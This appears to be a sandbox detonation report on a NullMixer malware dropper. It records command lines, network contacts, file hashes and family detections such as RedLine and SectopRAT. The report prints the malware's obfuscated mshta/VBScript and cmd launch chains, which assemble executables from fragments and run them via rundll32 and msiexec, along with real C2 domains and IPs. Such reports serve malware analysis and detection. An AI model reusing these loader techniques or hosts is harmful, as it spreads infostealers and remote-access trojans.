"C:\Windows\System32\mshta.exe" vBscRIpT: ClOsE (CReAteObJect("WScRipT.ShELL" ). RUn ( "CMd.eXE /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat06f5ed0e3bb24.exe"" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if """" == """" for %z in ( ""C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat06f5ed0e3bb24.exe"" ) do taskkill -Im ""%~nXz"" /F " , 0 , TrUe ) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 272

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "Sat0675f75df01bdb.exe" /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat06f5ed0e3bb24.exe" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if "" == "" for %z in ( "C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat06f5ed0e3bb24.exe" ) do taskkill -Im "%~nXz" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0663b341399ee.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0663b341399ee.exe" ) do taskkill /F -Im "%~NxU"

C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe

H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5

C:\Windows\SysWOW64\taskkill.exe

taskkill -Im "Sat06f5ed0e3bb24.exe" /F

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBscRIpT: ClOsE (CReAteObJect("WScRipT.ShELL" ). RUn ( "CMd.eXE /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe"" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if ""/paMxRK9ViV3PT5Jnz5"" == """" for %z in ( ""C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe"" ) do taskkill -Im ""%~nXz"" /F " , 0 , TrUe ) )

C:\Users\Admin\AppData\Local\Temp\09xU.exE

09xU.EXE -pPtzyIkqLZoCarb5ew

C:\Windows\SysWOW64\taskkill.exe

taskkill /F -Im "Sat0663b341399ee.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if "/paMxRK9ViV3PT5Jnz5" == "" for %z in ( "C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe" ) do taskkill -Im "%~nXz" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"

C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat062000ca9aa6.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat062000ca9aa6.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCRIpt: cLosE ( CREAteobjEcT ( "WscRiPt.SHeLl" ). rUN ("C:\Windows\system32\cmd.exe /Q /r eCho NqN%TIME%> FvfG42h.8 & echo | Set /P = ""MZ"" > IiKZCUV.MQ & CoPY /Y /b iIKZCUV.MQ + 6H87pFZ.4 + FDKD47Ef.I1 + U56d.R + JB946RB.I7A + Q_tW.pL + BTDIJ1.FYL + FVfg42H.8 XHnbBPN.0kM & StArT msiexec.exe /y .\xHnBBPN.0kM " , 0 ,True ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCHO "

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /Q /r eCho NqN%TIME%> FvfG42h.8& echo | Set /P = "MZ" > IiKZCUV.MQ & CoPY /Y /b iIKZCUV.MQ + 6H87pFZ.4 +FDKD47Ef.I1+ U56d.R + JB946RB.I7A + Q_tW.pL + BTDIJ1.FYL + FVfg42H.8 XHnbBPN.0kM & StArT msiexec.exe /y .\xHnBBPN.0kM

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"

C:\Windows\SysWOW64\control.exe

control .\R6f7sE.I

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>IiKZCUV.MQ"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I

C:\Windows\SysWOW64\msiexec.exe

msiexec.exe /y .\xHnBBPN.0kM

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2796 -s 440

C:\Windows\system32\RunDll32.exe

C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I

Network

Country Destination Domain Proto
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 gazrxlog.xyz udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 whealclothing.xyz udp
US 8.8.8.8:53 my-all-group.bar udp
US 8.8.8.8:53 m525-blockchain31432.bar udp
FR 91.121.67.60:23325 tcp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 172.67.133.215:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
FR 91.121.67.60:23325 tcp
N/A 127.0.0.1:49275 tcp
N/A 127.0.0.1:49277 tcp
FR 91.121.67.60:23325 tcp
FR 91.121.67.60:23325 tcp
US 72.84.118.132:8080 tcp
FR 91.121.67.60:23325 tcp
US 72.84.118.132:8080 tcp
FR 91.121.67.60:23325 tcp

Files

\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 c93901703b1d556d494f7a31ffb04720
SHA1 d14e2dc239ac85e6020f1fc4c035f7d2ea72d262
SHA256 0d5b2226f4199a3891ec836c5b54023595b4aa06d4a80e816a8d6545a0bb3631
SHA512 3e31e881d7b7c74baa5ea0e8d97f86dfc6feb06ec7061f30891b7736477f2888fdb58ccaa4d8ea764249191c89e5897954515b6bfdfe6a45d51640c63c20e900

\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe

MD5 a979670adefae9ab376382f3229f3f28
SHA1 5b5b75a789e46a2f8ac02fba3d895fa968387c9b
SHA256 a8ae45e63487b6dd93bf61429d996be4abc922785e893717cdecd84b0b6f2040
SHA512 f023b21556d5ba5cd747f02ccc99ee1a27fea1d1c675615efa31664301b53dacb253f1b92356a8aea7ab0eba77e89d0fea7d0ba088bc17599fe55278e0fb744b

\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

memory/2796-76-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat06ebc37d1c94352.exe

MD5 e9133ca1a95483a3331d0f336685302d
SHA1 48c1348e20b26be8227ed63a1db0f13716f1b8e3
SHA256 1145ee6af1fb495cb10eda71b3377e5ff6a21224c613f598c1c736fb6eaac58b
SHA512 009c74131d2fa256e55a4735eee2b498a673a7857635e78f12e442b27025a99562356ccb8db15c4119e6b2ff477a07f85db8290f58f4821626bae0f729b61f57

\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0663b341399ee.exe

MD5 7c6b2dc2c253c2a6a3708605737aa9ae
SHA1 cf4284f29f740b4925fb2902f7c3f234a5744718
SHA256 b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba
SHA512 19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07

\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat062000ca9aa6.exe

MD5 1cc8a64b178076dca421fedc3a248a56
SHA1 db8ed444965577dfb6db4f92ddd8d96a157ddea5
SHA256 1f7a19b62d2e0dfddefe2d8e829bd1af457806d61bc650aa9e3ed340a0886345
SHA512 c77b3c1ca13b18b6335b93106c285c4c9fdade11e0d1ab022cb4465228b2d8a0325a930e1b371e66973e36188fac023ae96eac0ff9921d63dc9734a38deb07ff

memory/3000-127-0x0000000000400000-0x000000000089B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe

MD5 0e05650d436fd4d92775cd4f65973870
SHA1 4d13aaa6b18630d0c89400cee5933130f03bd762
SHA256 42c9a8d4eba1a23988476036c02318b3452e3ba835cb08786771ba63f6803b16
SHA512 6cf7a676cc7d5114293add15dd8fe029ef7e145183ac550600e7c0c85be33e0b2c42f0456838807971c4e122599a7d42fc33f44ca606cf24fbaaf8b43196ac08

memory/2620-164-0x00000000021B0000-0x00000000022FC000-memory.dmp

memory/556-165-0x0000000002540000-0x0000000002742000-memory.dmp

memory/2780-178-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2780-176-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2780-175-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2780-174-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2780-172-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2780-170-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2780-168-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2780-166-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2796-179-0x0000000000400000-0x000000000051B000-memory.dmp

memory/2796-187-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2796-186-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2796-185-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2796-183-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2796-180-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2620-188-0x0000000002E40000-0x0000000002EE5000-memory.dmp

memory/2620-192-0x0000000002EF0000-0x0000000002F82000-memory.dmp

memory/2620-189-0x0000000002EF0000-0x0000000002F82000-memory.dmp

memory/556-193-0x0000000002CF0000-0x0000000002D95000-memory.dmp

memory/556-197-0x0000000002DA0000-0x0000000002E32000-memory.dmp

memory/556-194-0x0000000002DA0000-0x0000000002E32000-memory.dmp

memory/2944-129-0x00000000003C0000-0x00000000003C6000-memory.dmp

memory/344-128-0x0000000001360000-0x00000000013C8000-memory.dmp

memory/2824-198-0x0000000000400000-0x0000000000883000-memory.dmp

memory/556-200-0x0000000002540000-0x0000000002742000-memory.dmp

memory/2620-199-0x00000000021B0000-0x00000000022FC000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0619212f22dd7.exe

MD5 854ea0bc0602795b95da3be8257c530f
SHA1 f243a71edc902ed91d0f990630a73d0d01828c73
SHA256 c01e2d31948bc4de2df55929062171e7dbc85b84ee764b799520d6f0740e1e1e
SHA512 2a2b55cdbc3d62fc26af219d88b31f87782a8a550d273997d6d383a877c85529c8f0c7983c77ef4f176a2ce32119fd8733658aeb86de9215629c0e6012ce544c

\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0618d93ac2c5c.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

memory/2944-115-0x0000000001220000-0x000000000123A000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0675f75df01bdb.exe

MD5 dd2fdd69b9db1cf5764dcfd429a1cf5e
SHA1 c45f13f1e2d166ff7ea70786d51b2fdd3bdea2e8
SHA256 d22db6b8e674124371143c301994af4326668dbdfe3dcdc5fdd949d066057afe
SHA512 c4aa0a831701e0ac9ca5bf7da6d46cd1a02d44248a2a4e85a3c79205182d245490245bdd90a357def492bb984249987097af70aed71331c12f8e238b10f2b60d

\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0647140c100d63.exe

MD5 10e13cc7b41d162ab578256f27d297b1
SHA1 1d938b7e6e99951d9b8139f078483539120021e6
SHA256 7c91657c83118c91043fcdb9d616fbf219acc7ea7d793e3276e8ee801d1576c9
SHA512 22769c54259f0f82eed0f6d8d8c0d0040acf276baab8e75ed7832c771f1544939918ada9d1bc386acca0db84a0291f5932fff0f5d131e1127aff87811353e3cd

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NVX9Z8PTS0WU4CI6G0TB.temp

MD5 e1fe0785abfdaf20ec9f62376f97c2a3
SHA1 b01626c55df5f089fc64b30e383f3b90a22d345d
SHA256 8c5508a1706c3350159b72bd67e400b16fda92a40fc72ac86a27602adede39f7
SHA512 a2da6235209820148667b37564a16ad23ff22acd586d51c9512346fa9f6a5f9d1a6d9ace350b3c73021f2886c7745d26670eadd84b24276c90cbaba898355b68

C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat060fd7e42d2.exe

MD5 29c9683aa48f1e3a29168f6b0ff3be04
SHA1 f2fde0bb1404e724387c4a4445d3e7c2c07d8d3f
SHA256 e46b9e2dd407bf942a3d19b75277ae6893a0b6c87e2df9d6047a9b35ebc53901
SHA512 a7092b9e781512a6f8f2fdcefb45cfb026a6e1f8762b06c0e969c8d52389d22e3d111ae67ba82bf49ad462953091def927ba911eb7dabee061f68d4aacde9891

memory/2796-77-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2796-73-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2796-75-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2796-74-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2796-72-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2796-71-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2796-70-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2796-69-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2796-68-0x000000006FE40000-0x000000006FFC6000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/2796-60-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2796-57-0x000000006B280000-0x000000006B2A6000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

memory/556-206-0x0000000002DA0000-0x0000000002E32000-memory.dmp

memory/2620-209-0x0000000002EF0000-0x0000000002F82000-memory.dmp

memory/2620-210-0x0000000002F90000-0x0000000003CD1000-memory.dmp

memory/2620-211-0x00000000008F0000-0x000000000097B000-memory.dmp

memory/2620-212-0x0000000000D10000-0x0000000000D97000-memory.dmp

memory/2708-215-0x0000000002850000-0x000000000299C000-memory.dmp

memory/2708-217-0x0000000002850000-0x000000000299C000-memory.dmp

memory/2708-219-0x0000000002DF0000-0x0000000002E95000-memory.dmp

memory/2708-220-0x0000000002EA0000-0x0000000002F32000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win7-20240903-en

Max time kernel

149s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe"

Signatures

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19411ac950924ec3f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue1993b3f72c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19c1338f41ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19325eb008c0b950.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19f51bcd77a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19150ee2be694c8a4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19c78ded4d176ac.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19761b3b8d9d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue192762f1cd058ddf8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue1969586bcbf58493.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19879c4c0e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue193858933525b62.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19c06f159e0ec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue195c40958f528163.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue192762f1cd058ddf8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-6C6DU.tmp\Tue19879c4c0e.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19879c4c0e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-CFL7R.tmp\Tue19879c4c0e.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19f51bcd77a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue195c40958f528163.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19761b3b8d9d.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19411ac950924ec3f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19411ac950924ec3f.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19c1338f41ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19c1338f41ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue1993b3f72c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue1993b3f72c.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19325eb008c0b950.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19325eb008c0b950.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19f51bcd77a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19f51bcd77a.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19150ee2be694c8a4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19150ee2be694c8a4.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19761b3b8d9d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19761b3b8d9d.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue1969586bcbf58493.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue1969586bcbf58493.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19879c4c0e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19879c4c0e.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue193858933525b62.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue193858933525b62.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19c06f159e0ec.exe N/A
